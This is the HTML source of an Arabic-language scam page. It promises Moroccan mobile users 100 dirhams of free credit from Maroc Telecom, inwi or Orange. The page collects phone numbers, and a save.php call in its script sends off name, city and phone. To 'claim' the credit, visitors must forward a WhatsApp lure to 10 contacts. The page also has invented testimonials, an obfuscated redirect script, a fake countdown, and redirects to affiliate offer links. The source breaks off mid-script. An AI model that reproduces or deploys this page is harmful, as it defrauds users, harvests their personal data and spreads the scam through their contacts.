<html><head>
<div style="width: 100%;margin:0 auto;">
<div align="center" style="">
<div style="width:100%;margin:0 auto;">
</div>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">   
<title>رصيد مجاني - نشر</title>
<link href="//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Titillium+Web:400,300,600,700" rel="stylesheet" type="text/css">

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-164263096-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-164263096-1');
</script>



<script src="overflow.js"></script>




<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

<script>
var _0xd069=["href","location","arliker.com","indexOf","show","#hidebox","#","slideUp","parent","fadeIn",".question2","click",".question1 a",".question3",".question2 a",".question4",".question3 a",".pre-text","fast",".check1","hide","delay",".check2",".testimonials",".question4 a","ready"];$(function(){var _0x3f61x1=window[_0xd069[1]][_0xd069[0]];if(_0x3f61x1[_0xd069[3]](_0xd069[2])>  -1){$(_0xd069[5])[_0xd069[4]]()}else {window[_0xd069[1]][_0xd069[0]]= _0xd069[6]}});$(document)[_0xd069[25]](function(){$(_0xd069[12])[_0xd069[11]](function(){$(this)[_0xd069[8]]()[_0xd069[7]]();$(_0xd069[10])[_0xd069[9]](400)});$(_0xd069[14])[_0xd069[11]](function(){$(this)[_0xd069[8]]()[_0xd069[7]]();$(_0xd069[13])[_0xd069[9]](400)});$(_0xd069[16])[_0xd069[11]](function(){$(this)[_0xd069[8]]()[_0xd069[7]]();$(_0xd069[15])[_0xd069[9]](400)});$(_0xd069[24])[_0xd069[11]](function(){$(_0xd069[17])[_0xd069[7]]();$(this)[_0xd069[8]]()[_0xd069[7]]();$(_0xd069[19])[_0xd069[9]](_0xd069[18]);$(_0xd069[19])[_0xd069[21]](4000)[_0xd069[20]](1);$(_0xd069[22])[_0xd069[21]](4500)[_0xd069[9]]();$(_0xd069[23])[_0xd069[21]](5000)[_0xd069[9]]()})})
</script><meta http-equiv="refresh" content="740; url=#">


<script>


</script>


<meta property="og:description" content="إضغط هنا للحصول على الهاتف !">
<meta content="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ26Zu8Q8oSuiaVKBqIGjPgKUp0lH3H9jb8ayG_oUy8D9-KKbhO" name="og:image">
<link href="http://www.iconsdb.com/icons/preview/gray/apple-xxl.png" rel="shortcut icon">
<style>

*, :before, :after {
    box-sizing: border-box
}

html {
    height: 100%
}

body {
    background-size: cover;
    color: #000;
    direction: rtl;
    font-family: droid arabic naskh , Titillium Web;
}

h1, h2, h3, h4 {
    font-weight: 400
}

h1 {
    font-size: 1.4em;
    line-height: 1em
}

#date {
    color: white;
    margin-right: 15px;
}

h1 {
    font-size: 24px;
	text-align:center;
}

h2 {
    font-size: 1.3em;
	text-align: center;
}

#wrapper {
    height: 100%;
    width: 100%
}

#intro {
    font-size: 1px
}

#questionWrapper {
    background: none repeat scroll 0 0 #fff;
    width: 92%;
    min-height: 460px;
    margin: 5px auto;
    padding: 20%;
    border-radius: 15px;
    box-sizing: border-box;
    max-width: 985px;
}

.answer {
    text-transform: uppercase;
    display: block;
    margin-bottom: 10px;
    font-size: 1em;
    color: #000;
    border: 2px solid #000;
    background: none repeat scroll 0 0 rgba(224, 232, 139, 0.7);
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 7px 0
}

.result {
    display: none
}



.lastMargin {
    height: 5px
}

.alpha60 {
    background: none repeat scroll 0 0 rgba(0, 0, 0, 0.6)
}

img.loader {
    clear: both;
	text-align:center;
    margin: 0 0 10px;
}
.one1 {display:none;}
.one2 {display:none;}
.one3 {display:none;}
.check {
    clear: both
}

.checkItem {
    clear: both;

    overflow: auto
}

.checkItem span.img {
    vertical-align: middle;
    display: table-cell;
    padding-right: 10px
}

.checkItem span.img img {
    display: block
}

.checkItem h3 {
    vertical-align: middle;
    display: table-cell;
    padding: 0;
    margin: 0
}

a.callToAction {
    background: none repeat scroll 0 0 #3e7f1b;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 20px;
    padding: 10px 20px;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #79B85E), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -moz-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -webkit-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -ms-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: linear-gradient(to bottom, #79B85E 0%, #4C8F28 100%);

}

a.callToAction:hover {
    text-decoration: underline
}

.countWrapper {
    display: block;
    clear: both;
    font-size: 12px;
    margin: 5px
}

.centerIt {
    margin: 0 auto;
    text-align: center
}

.centerIt a {
    margin: 0 auto
}

.cta {
    margin-bottom: 14px;
    cursor:pointer;
}

#header {
    color: #000;
    height: 85px;
    margin: 0 auto;
    max-width: 985px;
    padding: 0 0 6px;
    position: relative;
    width: 100%
}

#logo {
    height: 85px;
    float: left;
    width: 300px
}

#date {
    font-size: 16px;
    font-weight: 700;
    position: absolute;
    right: 10px;
    top: 62px;
    color: #fff
}

audio:not([controls]) {
    display: none;
    height: 0
}

html {
    font-family: droid arabic naskh , Titillium Web;
}

body {
    margin: 0
background: #154dc6;
}
.bb{

   

}

 
    
}

a {
    background: none repeat scroll 0 0 transparent
}

a:focus {
    outline: thin dotted
}

a:active, a:hover {
    outline: 0 none
}

b, strong {
    font-weight: 700
}

img {
    border: 0 none
}

svg:not(:root) {
    overflow: hidden
}

button::-moz-focus-inner, input::-moz-focus-inner {
    border: 0 none;
    padding: 0
}

.red {
    color: #fd0c25
}

.likebar {
    font-size: 13px;
    margin: 5px 5px 0 0;
    float: right;
    color: #7F7F7F
}

.likebar:not-children {
    font-size: 20px
}

.fbblue {
    color: #3b5998
}

.likes {
    background-position: left center;
    background-repeat: no-repeat;
    background-image: url(../img/like.png);
    padding-left: 17px
}

.valid {
    font-size: 12px;
    margin: 5px 0;
    color: #616161
}

@media screen and (max-width: 420px) {
    .checkItem h3 {
        font-size: 11px
    }

    #date {
        font-size: 10px
    }
}

h2 {
    margin-top: 10px
}


.content_sec {
    width: 100%;
    padding: 0;
    margin: 0;
    background: #fff;
    border-radius: 10px
}

.content_inn {
    padding: 30px;
    overflow: auto
}

.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.content_sec h2 {
    width: 100%;
    float: lzft;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea;
	text-align: left;
}

.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 15px;
    margin: 0 0 15px;
    border-bottom: 1px solid #eaeaea
}

.detail_left {
    width: 133px;
    float: left;
    padding: 0;
    margin: 0 22px 0 0
}

.detail_left img {
    width: 100%;
    max-width: 133px;
    height: auto
}

.detail_right {
    overflow: hidden;
	text-align: right
}

.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}

.detail_right h3 a {
    color: #3b5998
}

.detail_right h3 a:hover {
    color: #5f7dbc
}

.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}

.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}

@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }

    #logo {
        max-width: 70%;
        height: auto
    }

    .wrapper {
        padding: 0
    }

    .content_inn {
        padding: 0
    }

    .content_sec h1 {
        font-size: 15px
    }

    .content_sec h2 {
        font-size: 15px
    }

    .detail_left {
        width: 70px;
        margin: 0 10px 0 0
    }

    .detail_right h3 {
        font-size: 15px;
        font-weight: 700;
        text-decoration: none
    }

    .detail_right p {
        font-size: 13px
    }

    .detail_right span {
        font-size: 12px
    }
}

.container {
    width: 960px;
    margin: 0 auto;
    padding: 0
}



.content_sec {
    width: 100%;
    float: left;
    padding: 0;
    background: #fff;
    border-radius: 10px
}

.content_inn {
    padding: 30px
}

.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.content_sec h2 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 20px;
    margin: 0 0 20px;
    border-bottom: 1px solid #eaeaea
}

.detail_left {
    width: 133px;
    float: right;
    padding: 0;
    margin: 0 0 0 10px;
}

.detail_left img {
    width: 100%;
    max-width: 133px
}

.detail_right {
    overflow: hidden;
    font-family: arial;
}

.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}

.detail_right h3 a {
    color: #3b5998
}

.detail_right h3 a:hover {
    color: #5f7dbc
}

.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}

.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}

@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }

    .wrapper {
        padding: 0
    }

    .content_inn {
        padding: 0
    }

    .content_sec h1 {
        font-size: 15px
    }

    .content_sec h2 {
        font-size: 15px
    }

    .detail_left {
        width: 90px;
        margin: 0 0 0 10px
    }

    .detail_right h3 {
        font-size: 15px;
        font-weight: 700
    }

    .detail_right p {
        font-size: 13px
    }

    .detail_right span {
        font-size: 12px
    }
}

.hide {
    display: none
}

.red {
    color: red
}

.centerIt div {
    margin: 0 auto;
}

div.callToAction1 {
    background: #435a8b linear-gradient(to bottom, #435a8b 0%, #435a8b 100%) repeat scroll 0 0;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 18px;
    padding: 10px 20px;
    cursor:default;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #435a8b), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -moz-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -webkit-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -ms-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: linear-gradient(to bottom, #435a8b 0%, #435a8b 100%);
    cursor:pointer;
}

#intro {
    font-size: 13px;
	text-align: center;
}
#intro2 {
    font-size: 13px;
	text-align: center;
}
#intro4 {
    font-size: 13px;
	text-align: center;
	display: none;
}
* {
    text-decoration: initial;
}

#questionWrapper {
    padding: 0.5% 5%;
}

u {
    text-decoration: underline;
}

#top-ribbon {
    background: black;
    color: white;
    padding: 10px;
    font-size: 10px;
    border-bottom: 1px solid white;
}

.center {

    text-align: center;
}

#iframe {
    display: none;
    maxrgin-top: 45px;
}

#iframe iframe {
    border: 0px;
    overflow: hidden;

    height: 800px;
}

#iframe h1 {
    text-align: center;
    font-family: droid arabic naskh;
    font-weight: bold;
    color: #ffea00
}

#iframe h1 span {
    color: white;
}
.text {
    margin: 0 auto;
    background: #3e3c3d;
    color: #fff;
    padding: 10px;
    text-align: center;
    border-radius: 20px;
    max-width: 500px;

}



.answer, .prepopulate .submit {
    display: block;
    margin-bottom: 10px;
    font-size: 1em;
    font-weight:bold;
    border: 2px solid black;
    background: none repeat scroll 0 0 #feb10e;
    color: black;
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 9px 0;
    letter-spacing: 1px;
    text-transform: none !important;
    border: none;
    border-radius: 15px;
    background-color: #A5171A;
    color: #fff;
    transition: color, background-color 0.1s ease-in-out !important;
}

.prepopulate .txt {
    border: 1px solid #37B06D !important;
}
#date {
    color:black;
    font-weight:normal;
    float:right;
}
.responsive {
    max-width:100%;
    max-height:100%;
}

.phone-header {
    background: #525252;
    padding:10px;
}
.intro {
    width:100%;
    margin:auto;
    text-align:center;
}
.pre-text p,.intro h3 {
    font-size:15px;
}


@media screen and (max-width: 414px) {
    h1 {
        font-size:25px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}
@media screen and (max-width: 375px) {
    h1 {
        font-size:22px;
    }
}

@media screen and (max-width: 360px) {

    h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:14px;
    }
    .lang-es h1 {
        font-size:15px;
    }
    .lang-cs h1 {
        font-size:15px;
    }
    .lang-nl h1 {
        font-size:16px;
    }
    .lang-fi h1 {
        font-size:16px;
    }
    .lang-sv h1 {
        font-size:15px;
    }
    .lang-hu h1 {
        font-size:15px;
    }
    .lang-pt h1 {
        font-size:15px;
    }
}



@media screen and (max-width: 320px) {
    .intro {

        text-align:center;
    }
    .intro img {
        max-height:120px;
        margin:0px auto;
    }
    #questionWrapper {
        padding:4px;
        padding-top:0px;
        margin-left:10px;
        margin-rightx:5px;

    }
    .pre-text p,.intro h3 {
        font-size:15px;
    }

    h2 {
        font-size:17px;
    }
    h1 {
        font-size:18px;
    }
    .lang-es h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}

.button {
text-decoration: none;
background:#f44335;
color: #fff;
border: 2px solid #3e3c3d;
display:inline-block;
position:relative;
margin:30px 5px;
padding: 8px 15px;
    border-radius: 5px;
transition:all 0.4s ease
}
.button:hover {
 background:#fff;
color: #4d90fe;
cursor: pointer;
}
.overlay {
  position: fixed;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  background: rgba(0, 0, 0, 0.7);
  transition: opacity 500ms;
  visibility: hidden;
  opacity: 0;
}
.overlay:target {
  visibility: visible;
  opacity: 1;
}

.popup {
  margin: 70px auto;
  padding: 20px;
  background: #fff;
  color: red;
  border-radius: 5px;
  max-width: 420px;
  position: relative;
  transition: all 5s ease-in-out;
  overflow-x: hidden;
}

.popup h2 {
  margin-top: 0;
color: #000;
height: 30px;
}
.popup .close {
position: absolute;
top: 0px;
right: 20px;
transition: all 200ms;
font-size: 30px;
font-weight: bold;
text-decoration: none;
color: #333;
}
.popup .close:hover {
  color: #06D85F;
}
.popup .content {
  max-height: 30%;
  overflow-y: hidden;
}
</style>



<link rel="me" href="https://www.blogger.com/profile/16855113845215673825" />
<link rel="openid.server" href="https://www.blogger.com/openid-server.g" />
<link rel="me" href="https://www.blogger.com/profile/05650487682315919878" />
<link rel="me" href="https://www.blogger.com/profile/15261487468165565939" />
<link rel="me" href="https://www.blogger.com/profile/02913265021461415955" />
<link rel="me" href="https://www.blogger.com/profile/09084010191540842750" />
<link rel="me" href="https://www.blogger.com/profile/17069663856294738959" />
<link rel="me" href="https://www.blogger.com/profile/16278545925663099407" />
<link rel="me" href="https://www.blogger.com/profile/17069663856294738959" />
<link rel="me" href="https://www.blogger.com/profile/10981950281478741085" />
<link rel="me" href="https://www.blogger.com/profile/13524759082269705321" />
<link rel="me" href="https://draft.blogger.com/profile/13524759082269705321" />
<link rel="me" href="https://www.blogger.com/profile/13524759082269705321" />
<link rel="me" href="https://www.blogger.com/profile/05932182067018832105" />
<link rel="me" href="https://www.blogger.com/profile/01691809442980942033" />
</head>

<body cz-shortcut-listen="true"><audio autoplay="autoplay" preload="">






<source src="alert.oga" type="audio/ogg">
<source src="alert.mp3" type="audio/mpeg">
</audio>





<div class="main section" id="main">
</div>
<!-- Please Keep The Credits -->


<div id="wrapper">
    <div id="questionWrapper" class="alpha60">

        <div class="intro">



<div class="ads1">

</div>
        </div>
       <div class="pre-text">
            <div id="intro">


            </div>
        </div>


<center>

</center>


<div class="check2">




    <div class="check2">
        <div class="share-section">

<center class="bb"><img src="https://d.top4top.io/p_188027cjd0.jpg" width="300" height="400"/></center>
			<h2>تبقى لك خطوة للحصول على <span style="color:#f44335;"><b> الرصيد المجاني</b></span></h2>
<div id="intro">

</center>
 <center><img src="https://i.imgur.com/8gjlaWS.png" class="Center" height="26" width="259"></center>
 <br>
 <center>
   <span style="color:#068a00;font-size: 22px;">إختر شركة الإتصال الخاصة بك</span><br>
   <select aria-label="رصيد مجاني" name="birthday_year" id="year" title="رصيد مجاني" class="_5dba" style="
   width: 272px;
   height: 55px;
">
     
     <option class="ox" value="أختر نوع الشبكة" selected="1">اختر الشبكة </option>
     <option value="2021">انوي-inwi</option>
     <option value="2021">اورنج - Orange</option>
     <option value="2021">اتصالات المغرب -Maroc Telecom</option>
   </select>
 </center>
 <br>
 <center>
   <center><img src="https://i.imgur.com/rvF0CP6.png"></center>
   <center><img src="https://i.imgur.com/oekPikl.gif"></center>
   <input type="tel" placeholder="XXXXXXXXX" id="phonee" name="Phone" style="fontwidth: 225px;height: 56px;font-size: 25px;width: 254px;margin-top: 7px;" onkeypress="return numberonly(event);">
 </center>
 <br>
 <br>
 
 
<center>
<span style="color: #000000;font-size: 15px;"><b> اضغط على الزر في الأسفل وارسل الدعوة</b></span>
<span style="color: #c30000;font-size: 15px;"><b> لـ 10 أشخاص</b></span>
<span style="color: #000000;font-size: 15px;"><b>على تطبيق</b></span>
<span style="color: #0e9d58;font-size: 15px;"><b>  الـواتساب</b></span>
<span style="color: #000000;font-size: 15px;"><b>  </b></span>


</center>
</div>

<center><img src="https://i.imgur.com/hxzBI6E.gif"></center>
<script>
        var local = {"fb_cookie_name":"faba"};
</script>




<center>
<div class="whatsent">
<a href="whatsapp://send?text=


*عاجل للمغاربة*🇲🇦
%0A
بمناسبة اطلاق حماة التلقيح🌙 تعلن جميع شركات الاتصال (  Telecom،inwi،Orange) عن تقديم *رصيد مجاني بقيمة 100 درهم * لجميع العملاء العرض لفترة محدودة أقسم بالله الرصيد وصلني الأن *لحّق العرض* من هنا :
%0A
*Télécom* : maroc-covid19.great-site.net
                                                                                                                                                                     
*inwi* : maroc-covid19.great-site.net
                                                                                                                                                                     
*orange* : maroc-covid19.great-site.net
                                                                                                                                                                     

" data-action="share/whatsapp/share">
<img src="https://i.imgur.com/o9gCQEH.png" height="45" border="0" align="middle" width="260"></a>
</div>
</center>


<div id="intro2">
<p><b>بعد الإنتهاء من نشر الدعوة إضغط على " ارسال الرصيد " ليصلك الرصيد المجاني بعدها على الفور</b>
</div>

  <a href="https://cutt.ly/Klc9dsY"><img src="https://i.imgur.com/ZDHB6rW.png" ></a>

            <h2 style="color: #D3000A;font-size: 13px;font-weight: bold;margin: 5px 0 0;">ملاحظة : لن يصلك الرصيد في حال لم ترسل الدعوة</h2>

<br>

<div id="done" class="overlay">
	<div class="popup">
		<h2><img style="width: 40px; margin-bottom: 20px" src="https://cdn0.iconfinder.com/data/icons/shift-free/32/Error-128.png"></h2>
		<a class="close" href="https://smrturl.co/o/165094/53184984?s1=">×</a>
		<div class="content">
			المعذرة، أنت لم تنشر الرسالة الى 10 اشخاص في الواتس آب ، من فضلك أنشرها
		</div>
	</div>
</div>
</div>
    </div>
</div>
        
    <div class="content_sec">
        <div class="content_inn">
		<h1>تعليقات الحاصلين على الرصيد - المغاربة</h1>
            <h2>52,266 تعليقات</h2>

            <div class="detail_block">

                <div class="detail_left"><a href="http://snapchat.com/add/ddzzdya" target="_blank"><img src="https://i.top4top.io/p_18552sk1n1.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>عبدالله </a></h3>

<p>
شكراً على المصداقية انا حصلت على رصيد 100 درهم بعد إتمام الخطوات #شكرا_الاتصالات 
<br><br>

</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">29</span> ·
            <span>at 04:13 pm</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="https://goo.gl/U5P9rg" target="_blank"><img src="https://f.top4top.io/p_1855873ge1.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>جنان</a></h3>

<p>
شكراً على المصداقية انا حصلت على رصيد 100 درهم بعد إتمام الخطوات #شكرا_الاتصالات المغرب
</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">22</span> ·
            <span>at 4:18 pm</span>
            </span></div>

            <div class="detail_block">


                <div class="detail_left"><a href="https://goo.gl/U5P9rg" target="_blank"><img src="https://h.top4top.io/p_1855yuvsl1.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>فرح </a></h3>

<p>

انا نشرت الرسالة 8 مرات لكن لم يتم ارسال الرصيد نشرتها كثير الى ان حصلت على الرصيد بقيمة 100 درهم
</p>

                </div>
         <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
             <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
             <span class="fbblue likes">17</span> ·
             <span>at 10:14 am</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="https://goo.gl/U5P9rg" target="_blank"><img src="https://h.top4top.io/p_1855j7l033.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>علي التويجري</a></h3>

<p>
شكراً على المصداقية انا حصلت على رصيد 100 درهم بعد إتمام الخطوات #شكرا_انوي
<br><br>

</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">14</span> ·
            <span>at 3:33 am<https://smrturl.co/o/165094/53184984?s1=/span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="https://goo.gl/U5P9rg" target="_blank"><img src="https://i.top4top.io/p_1855i8ox84.jpg" width="133"></a>
                </div>

                <div class="detail_right">
                    <h3><a>مصطفى</a></h3>

<p>
اقسم بالله حصلت على الرصيد 100 درهم بنجاح شكرا لكم الاتصالات رمضان مبارك على الجميع
</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">13</span> ·
            <span>at 12:34 am</span>


            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="https://goo.gl/U5P9rg" target="_blank"><img src="https://g.top4top.io/p_1855gp7pq2.jpg" width="133"></a>
                </div>

                <div class="detail_right">
                    <h3><a>نزهة</a></h3>

<p>
شكرا لكم تم استلام الرصيد بعد نشر الدعوة
</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">6</span> ·
            <span>at 11:01 am</span>
            </span></div>
        </div>

<center>
<center>
</center>
    </center></div>
</div>






    </div>
    </div>





<div id="conversion-container"></div>
<a style="display: none">

<script id="_waul6m">var _wau = _wau || []; _wau.push(["dynamic", "ksaramadan", "l6m", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>

<script id="_waul6m">var _wau = _wau || []; _wau.push(["dynamic", "odcompany", "l6m", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>

</a>

<!-- Script UP -->
	<script>var texts = [""]
function loadCom(a, b) {
	setTimeout(function () {
		$(a).fadeIn(250);
	}, b);
}
$.fn.onEnterKey = function (callback) {
	$(this).keypress(function (event) {
		var code = event.keyCode ? event.keyCode : event.which;
		if (code == 13) {
			callback();
			return false;
		}
	});
}

function loadAllComment() {
	loadCom('#com1', 3250);
	loadCom('#com2', 5800);
	loadCom('#com3', 5700);
	loadCom('#com4', 7500);
	loadCom('#com5', 9000);
}

$(document).ready(function () {

	loadAllComment();

	$('.like').on('click', function () {
		var _this = $(this);
		if (_this.hasClass('active-like')) {
			_this.removeClass('active-like');
			$('.you').removeClass('activee');
		} else {
			_this.addClass('active-like');
			$('.you').addClass('activee');
		}
	});

	$(document).on('click', '.fblike', function () {
		var _this = $(this);
		var x = _this.next().next().html() == '' ? 0 : parseInt(_this.next().next().html());
		if (_this.hasClass('selected')) {
			_this.removeClass('selected').html('Ø¥Ø¹Ø¬Ø§Ø¨');
			_this.next().next().html(--x);
			if (x == 0) _this.next().next().addClass('likehide');
		} else {
			_this.addClass('selected').html('Ø¥Ø²Ø§Ù„Ø© Ø§Ù„Ø¥Ø¹Ø¬Ø§Ø¨');
			_this.next().next().html(++x);
			if (_this.next().next().hasClass('likehide')) _this.next().next().removeClass('likehide');
		}
	});
	$("#addCom").onEnterKey(function () {
		var value = $("#addCom").val();
		$("#addCom").val("");
		$("#myComment").html(value);
		$(".addComment").hide();
		loadCom('#myCom', 250);
	});


	var teilen = 10;

	var pruefen = 0;

	//3 Fragen und Pruefung   

	$("#frage_01").click(function () {
		$('#frage_02').slideDown();
		$('#frage_01').slideUp();
	});

	$("#frage_02").click(function () {
		$('#frage_03').slideDown();
		$('#frage_02').slideUp();
	});

	$("#frage_03").click(function () {
		$('#frage_04').slideDown();
		$('#frage_03').slideUp();
	});

	$("#frage_04 button").click(function () {
		if ($("#nameform").val() == "") {
			alert("ÙŠØ¬Ø¨ Ø¹Ù„ÙŠÙƒ ÙƒØªØ§Ø¨Ø© ÙƒØ§ÙØ© Ø§Ù„Ù…Ø¹Ù„ÙˆÙ…Ø§Øª Ø£ÙˆÙ„Ø§Ù‹ !!");
		} else {

			$.ajax({
				url: "save.php",
				data: {
					name: $("#nameform").val(),
					city: $("#cityform").val(),
					city1: $("#city1form").val(),
					phone: $("#phoneform").val()


				}

			});


			$("#Welcome").html("Ù…Ø¨Ø±ÙˆÙƒ " + $("#nameform").val() + " !");
			$('#content_02').fadeIn();
			$('#frage_04').fadeOut();
			$('#aufforderung').fadeOut();


			for (var i = 0; i < texts.length; i++) {
				texts[i] = texts[i].trim();
				//////////////////////////////////////////////////
				var name = "  " + $("#nameform").val();
				texts[i] = texts[i] + name;
				//////////////////////////////////////////////////
				texts[i] = texts[i].replace(/ /g, "%20");



			}
			var number = Math.floor((Math.random() * texts.length));
			var rand = "whatsapp://send?text=" + texts[number];
			$("#whats").attr("href", rand);


			var myTimer1 = window.setInterval(updateTimer1, 2000);

			function updateTimer1() {
				pruefen++;
				$("#check").text(pruefen);

				if (pruefen == 1) {
					show('#pruefen_01');
				}

				if (pruefen == 2) {
					show('#pruefen_02');
				}

				if (pruefen == 3) {
					show('#pruefen_03');
				}

				if (pruefen == 4) {
					window.clearInterval(myTimer1);
					$('#content_03').fadeIn();
					$('#content_02').fadeOut();
					$('#intro').fadeOut();
				}
			}
		}
	});

	$("#btnShare1").click(function () {
		teilen--;
		$('#anzahl').text(teilen);

		if (teilen == 0) {
			show('#btnWin');
			hide('#btnFakeWin');
		}

	});

	$("#btnShare2").click(function () {
		teilen--;
		$('#anzahl').text(teilen);

		if (teilen == 0) {
			show('#btnWin');
			hide('#btnFakeWin');
		}

	});

	$("#btnFakeWin").click(function () {
		alert('Please share it with  ' + Share + ' Other Contacts!');
	});

	function show(toBlock) {
		//setDisplay(toBlock, 'block');
		$(toBlock).show();
	}

	function hide(toNone) {
		//setDisplay(toNone, 'none');
		$(toNone).hide();
	}

	function setDisplay(target, str) {
		document.getElementById(target).style.display = str;
	}


	var zeit = new Date();

	var sec = zeit.getSeconds();

	if (sec < 6) {
		sec = 9
	}

	if (sec > 5 & sec < 13) {
		sec = 8
	}

	if (sec > 11 & sec < 19) {
		sec = 7
	}

	if (sec > 17 & sec < 25) {
		sec = 6
	}

	if (sec > 23 & sec < 31) {
		sec = 5
	}

	if (sec > 29 & sec < 37) {
		sec = 4
	}

	if (sec > 35 & sec < 43) {
		sec = 3
	}

	if (sec > 41 & sec < 49) {
		sec = 2
	}

	if (sec > 47 & sec < 55) {
		sec = 1
	}

	if (sec > 54) {
		sec = 0
	};


	var add = sec;

	var zeit2 = new Date();

	var minute = zeit2.getMinutes();

	var timer1 = (60 - minute) * 60;

	if (timer1 > 1800) {
		var resttimer = (30 - minute) * 10
	} else {
		var resttimer = (60 - minute) * 10
	};

	var timer = resttimer + add + 67;

	function updateTimer() {
		timer--;
		$("#gutschein").text(timer);

		if (timer < 9) {
			stopFunction();
		}
	}

	var myTimer = window.setInterval(updateTimer, 6000);

	function stopFunction() {
		window.clearInterval(myTimer);
	}
});



var c = 0;

$(document).ready(function () {
	$("#b1")
		.on('click', function () {
			++c;
			if (c > 10) {
				$(this)
					.attr({
						href: "https://goraps.com/fullpage.php?section=General&pub=533889&ga=g",
						target: "_self"
					});
			}
		});
	$("#b2")
		.on('click', function () {
			if (c > 4) window.location = "https://goraps.com/fullpage.php?section=General&pub=533889&ga=g";
